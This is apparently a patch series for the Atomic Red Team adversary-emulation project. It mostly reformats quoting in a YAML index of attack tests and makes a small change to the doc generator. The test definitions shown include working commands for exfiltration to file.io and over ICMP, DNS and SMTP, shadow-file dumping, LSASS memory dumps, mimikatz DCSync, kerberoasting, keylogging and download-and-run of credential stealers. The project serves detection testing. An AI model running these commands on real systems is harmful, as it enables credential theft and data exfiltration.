@@ -71655,10 +71655,10 @@ exfiltration: dependencies: - description: 'Curl must be installed on system. -' + ' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71674,7 +71674,7 @@ exfiltration: auto_generated_guid: 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 description: 'Exfiltrate data HTTPS using curl to file share site file.io -' + ' supported_platforms: - macos - linux @@ -71775,7 +71775,7 @@ exfiltration: auto_generated_guid: d1253f6e-c29b-49dc-b466-2147a6191932 description: 'Exfiltrates a file present on the victim machine to the C2 server. -' + ' supported_platforms: - windows input_arguments: @@ -72028,13 +72028,13 @@ exfiltration: in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } -' + ' name: powershell - name: Exfiltration Over Alternative Protocol - DNS auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 description: 'Exfiltration of specified file over DNS protocol. -' + ' supported_platforms: - linux executor: @@ -72079,7 +72079,7 @@ exfiltration: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} -' + ' name: powershell input_arguments: input_file: @@ -72482,7 +72482,7 @@ initial-access: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows 
@@ -72517,20 +72517,20 @@ initial-access: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1195.003: technique: external_references: @@ -72768,7 +72768,7 @@ initial-access: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -72779,10 +72779,10 @@ initial-access: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1078.002: @@ -73096,7 +73096,7 @@ initial-access: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list -' + ' supported_platforms: - windows input_arguments: @@ -73109,12 +73109,12 @@ initial-access: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" -' + ' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -73483,7 +73483,7 @@ initial-access: cleanup_command: 'Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore -' + ' - name: Word spawned a command shell and used an IP address in the command line auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f description: | 
@@ -73495,7 +73495,7 @@ initial-access: jse_path: description: 'Path for the macro to write out the "malicious" .jse file -' + ' type: String default: C:\Users\Public\art.jse ms_product: @@ -73506,7 +73506,7 @@ initial-access: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -73517,7 +73517,7 @@ initial-access: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -73526,7 +73526,7 @@ initial-access: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore -' + ' name: powershell T1566.002: technique: diff --git a/bin/generate-atomic-docs.rb b/bin/generate-atomic-docs.rb index df178712..d023d67c 100755 --- a/bin/generate-atomic-docs.rb +++ b/bin/generate-atomic-docs.rb 
@@ -233,13 +233,16 @@ class AtomicRedTeamDocs "techniqueID" => atomic_yaml['attack_technique'], "score" => 100, "enabled" => true, - "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" +# "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" + "links" => ["label" => "View Atomic", "url" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md"] } + techniqueParent = { "techniqueID" => atomic_yaml['attack_technique'].split('.')[0], "score" => 100, "enabled" => true, - "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" +# "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" + "links" => ["label" => "View Atomic", "url" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md"] } techniques.push(technique) From ebe64397beee1d073a91243288cba8a805a0628a Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 31 Jan 2022 20:33:23 +0000 Subject: [PATCH 09/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4140 ++++++++++++++++++------------------ 1 file changed, 2070 insertions(+), 2070 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 167324d3..b54288eb 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
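Review bot: The two `"comment"` entries are kept as commented-out code at column 0 inside the hash literals, and the GitHub URL expression is now spelled out four times (twice live, twice in comments); drop the commented lines and build the URL once before the first hash, e.g. `atomic_url = "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md"`, then use `"links" => [{ "label" => "View Atomic", "url" => atomic_url }]` in both `technique` and `techniqueParent`. The bare `["label" => ..., "url" => ...]` form relies on Ruby's implicit hash inside an array literal; the explicit braces make it obvious that a one-element array holding one hash is intended. The enclosing method begins before this hunk, so check that the new local does not shadow a name already used there.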
@@ -61,7 +61,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: bash elevation_required: true - name: Access /etc/passwd (Local) @@ -80,13 +80,13 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh - name: Access /etc/{shadow,passwd} with a standard bin that's not cat auto_generated_guid: df1a55ae-019d-4120-bc35-94f4bc5c4b0a description: 'Dump /etc/passwd and /etc/shadow using ed - ' +' supported_platforms: - linux input_arguments: @@ -97,17 +97,17 @@ credential-access: executor: command: 'echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' name: bash elevation_required: true - name: Access /etc/{shadow,passwd} with shell builtins auto_generated_guid: f5aa6543-6cb2-4fae-b9c2-b96e14721713 description: 'Dump /etc/passwd and /etc/shadow using bash builtins - ' +' supported_platforms: - linux input_arguments: @@ -122,7 +122,7 @@ credential-access: testcat /etc/shadow > #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: bash elevation_required: true T1557.002: @@ -313,32 +313,32 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' - description: 'Rubeus must exist - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} - ' +' executor: command: 'cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}" - ' +' cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: false T1552.003: 
@@ -393,7 +393,7 @@ credential-access: description: 'Search through bash history for specifice commands we want to capture - ' +' supported_platforms: - linux - macos @@ -415,7 +415,7 @@ credential-access: command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} - ' +' name: sh T1110: technique: @@ -650,7 +650,7 @@ credential-access: pod service account, for example) can access sensitive information that might include credentials to various services. - ' +' supported_platforms: - containers input_arguments: @@ -661,17 +661,17 @@ credential-access: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get secrets -n #{namespace} - ' +' name: bash elevation_required: false - name: Cat the contents of a Kubernetes service account token file @@ -679,7 +679,7 @@ credential-access: description: 'Access the Kubernetes service account access token stored within a container in a cluster. - ' +' supported_platforms: - linux dependency_executor_name: sh @@ -687,24 +687,24 @@ credential-access: - description: Verify docker is installed. prereq_command: 'which docker - ' +' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - ' +' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker - ' +' get_prereq_command: 'sudo systemctl start docker - ' +' - description: Verify kind is in the path. prereq_command: 'which kind - ' +' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind 
@@ -712,14 +712,14 @@ credential-access: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters - ' +' get_prereq_command: 'sudo kind create cluster --name atomic-cluster - ' +' - description: Verify kubectl is in path prereq_command: 'which kubectl - ' +' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -727,19 +727,19 @@ credential-access: - description: Verify atomic-pod is running. prereq_command: 'kubectl --context kind-atomic-cluster get pods |grep atomic-pod - ' +' get_prereq_command: 'kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity - ' +' executor: command: 'kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token - ' +' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod - ' +' T1056.004: technique: external_references: @@ -841,7 +841,7 @@ credential-access: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications - ' +' supported_platforms: - windows input_arguments: @@ -857,10 +857,10 @@ credential-access: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -946,7 +946,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. - ' +' supported_platforms: - linux input_arguments: 
@@ -958,16 +958,16 @@ credential-access: dependencies: - description: 'Requires SSHPASS - ' +' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; - ' +' executor: name: bash elevation_required: false @@ -979,7 +979,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. - ' +' supported_platforms: - macos input_arguments: @@ -991,11 +991,11 @@ credential-access: dependencies: - description: 'Requires SSHPASS - ' +' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" brew install hudochenkov/sshpass/sshpass @@ -1091,14 +1091,14 @@ credential-access: executor: command: 'python2 laZagne.py all - ' +' elevation_required: true name: bash - name: Extract passwords with grep auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 description: 'Extracting credentials from files - ' +' supported_platforms: - macos - linux @@ -1110,14 +1110,14 @@ credential-access: executor: command: 'grep -ri password #{file_path} - ' +' name: sh - name: Extracting passwords with findstr auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 description: 'Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. - ' +' supported_platforms: - windows executor: @@ -1143,7 +1143,7 @@ credential-access: description: 'This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. - ' +' supported_platforms: - macos - linux 
@@ -1207,7 +1207,7 @@ credential-access: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "word.Application" | Out-Null @@ -1218,7 +1218,7 @@ credential-access: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -1227,7 +1227,7 @@ credential-access: cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore - ' +' name: powershell - name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] @@ -1254,7 +1254,7 @@ credential-access: command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'' -UseBasicParsing); Get-CredManCreds -Force - ' +' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d @@ -1267,7 +1267,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Windows Credentials" /all - ' +' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e @@ -1280,7 +1280,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Web Credentials" /all - ' +' T1555.003: technique: created: '2020-02-12T18:57:36.041Z' 
@@ -1392,11 +1392,11 @@ credential-access: dependencies: - description: 'Modified Sysinternals must be located at #{file_path} - ' +' prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" @@ -1409,7 +1409,7 @@ credential-access: cleanup_command: 'Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Search macOS Safari Cookies auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b @@ -1446,10 +1446,10 @@ credential-access: dependencies: - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path}) - ' +' prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}" @@ -1467,7 +1467,7 @@ credential-access: dependencies: - description: 'Chrome must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -1495,7 +1495,7 @@ credential-access: dependencies: - description: 'Opera must be installed - ' +' prereq_command: if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1} 
@@ -1507,23 +1507,23 @@ credential-access: Stop-Process -Name "opera" - description: 'Opera login data file must exist - ' +' prereq_command: if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login Data") {exit 0} else {exit 1} get_prereq_command: 'New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login Data" -ItemType File - ' +' executor: name: powershell command: 'Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination $env:temp - ' +' cleanup_command: 'Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore - ' +' - name: Simulating access to Windows Firefox Login Data auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c description: | @@ -1535,7 +1535,7 @@ credential-access: dependencies: - description: 'Firefox must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1} @@ -1546,7 +1546,7 @@ credential-access: Start-Process $installer -ArgumentList '/S' -Wait - description: 'Firefox login data file must exist - ' +' prereq_command: if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1} get_prereq_command: | @@ -1560,7 +1560,7 @@ credential-access: command: 'Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force - ' +' cleanup_command: Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig T1552.002: @@ -1620,7 +1620,7 @@ credential-access: description: 'Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. - ' +' supported_platforms: - windows executor: @@ -1638,7 +1638,7 @@ credential-access: executor: command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s - ' +' name: command_prompt T1003.006: technique: 
@@ -1755,7 +1755,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -1772,7 +1772,7 @@ credential-access: command: '#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit" - ' +' T1556.001: technique: external_references: @@ -1979,7 +1979,7 @@ credential-access: description: 'This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system. - ' +' supported_platforms: - windows input_arguments: @@ -2008,11 +2008,11 @@ credential-access: prereq_command: 'if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true" -OutFile "#{petitpotam_path}" - ' +' executor: name: powershell elevation_required: false @@ -2161,7 +2161,7 @@ credential-access: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' - ' +' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -2292,7 +2292,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
@@ -2370,25 +2370,25 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' - description: 'Rubeus must exist - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} - ' +' executor: name: powershell elevation_required: false @@ -2482,26 +2482,26 @@ credential-access: files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: 'findstr /S cpassword %logonserver%\sysvol\*.xml - ' +' name: command_prompt - name: GPP Passwords (Get-GPPPassword) auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c 
@@ -2526,25 +2526,25 @@ credential-access: dependencies: - description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} - ' +' prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } - ' +' get_prereq_command: | New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: | . #{gpp_script_path} @@ -2717,15 +2717,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -2760,37 +2760,37 @@ credential-access: description: command flags you would like to run (optional and blank by default) type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' - description: 'Rubeus must exist - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} - ' +' executor: command: | klist purge cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}" cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: false - name: Extract all accounts in use as SPN using setspn @@ -2810,19 +2810,19 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: 'setspn -T #{domain_name} -Q */* - ' +' name: command_prompt - name: Request A Single Ticket via PowerShell auto_generated_guid: 988539bc-2ed7-4e62-aec6-7c5cf6680863 
@@ -2836,15 +2836,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\') + \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -2867,15 +2867,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -3044,7 +3044,7 @@ credential-access: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -3063,14 +3063,14 @@ credential-access: dependencies: - description: 'Checking if pam_tty_audit.so is installed - ' +' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' - ' +' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" - ' +' supported_platforms: - linux executor: 
@@ -3101,14 +3101,14 @@ credential-access: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. - ' +' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -3118,7 +3118,7 @@ credential-access: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND - ' +' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -3135,14 +3135,14 @@ credential-access: dependencies: - description: 'This test requires to be run in a bash shell - ' +' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' input_arguments: output_file: name: output_file @@ -3158,7 +3158,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm #{output_file} - ' +' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. 
@@ -3166,20 +3166,20 @@ credential-access: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' input_arguments: user_account: description: Basic ssh user account for testing. @@ -3193,7 +3193,7 @@ credential-access: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ - ' +' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -3205,14 +3205,14 @@ credential-access: dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -3221,7 +3221,7 @@ credential-access: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd - ' +' T1557.001: technique: external_references: @@ -3541,10 +3541,10 @@ credential-access: - description: 'Windows Credential Editor must exist on disk at specified location (#{wce_exe}) - ' +' prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -3584,10 +3584,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) - ' +' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" @@ -3598,7 +3598,7 @@ credential-access: command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using comsvcs.dll @@ -3613,10 +3613,10 @@ credential-access: command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full - ' +' cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Dump LSASS.exe Memory using direct system calls and API unhooking @@ -3639,10 +3639,10 @@ credential-access: - description: 'Dumpert executable must exist on disk at specified location (#{dumpert_exe}) - ' +' prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path 